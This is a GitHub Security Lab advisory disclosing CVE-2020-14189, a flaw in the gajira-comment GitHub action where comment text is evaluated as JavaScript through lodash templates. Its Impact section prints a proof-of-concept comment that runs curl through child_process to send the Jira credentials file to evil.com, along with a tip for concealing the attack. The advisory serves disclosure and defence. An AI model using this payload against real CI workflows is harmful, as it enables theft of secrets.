skip to content
Back to GitHub.com
Home Bounties CodeQL Research Advisories Get Involved Events
December 3, 2020

GHSL-2020-173: Undocumented template expression evaluation in the gajira-comment GitHub action - CVE-2020-14189

Jaroslav Lobacevski

Summary

The gajira-comment GitHub action isupports undocumented template syntax that may lead to arbitrary code execution.

Product

gajira-comment GitHub action.

Tested Version

2.0.1

Details

Issue: The potentially untrusted input value comment is evaluated as code by node.js

The action supports additional template transformation of the comment input value - all placeholders between double braces like {{event.issue.body}} are replaced with the according values from github.event context. The intention most probably was to use it like:

uses: atlassian/gajira-comment@v2.0.1
with:
    comment: |
    Comment created by {{ event.comment.user.login }}
    {{ event.comment.body }}

i.e. without the dollar sign and the root github context object.

However this feature is not documented and the built-in GitHub context expressions are used by the users of the action instead, like:

uses: atlassian/gajira-comment@v2.0.1
with:
    comment: |
    ${{ github.event.comment.body }}

This may lead to a double template evaluation if the user input contains {{}} itself. A public issue in a similar action was created by one of the action users that proves it does happen.

The internal template feature is implemented in a way that the user input is interpreted as javascript:

const _ = require('lodash')

const rawComment = this.argv.comment

_.templateSettings.interpolate = /{{([\s\S]+?)}}/g
const compiled = _.template(rawComment)
const interpolatedComment = compiled({ event: this.githubEvent })

Impact

This vulnerability allows for arbitrary code execution in the context of a GitHub runner. For example a user may create a comment with the body

{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials http://evil.com`) }}

which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible an attacker may modify the body of the comment to Never mind my bad. and close it.

CVE

CVE-2020-14189

Coordinated Disclosure Timeline

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-173 in any communication regarding this issue.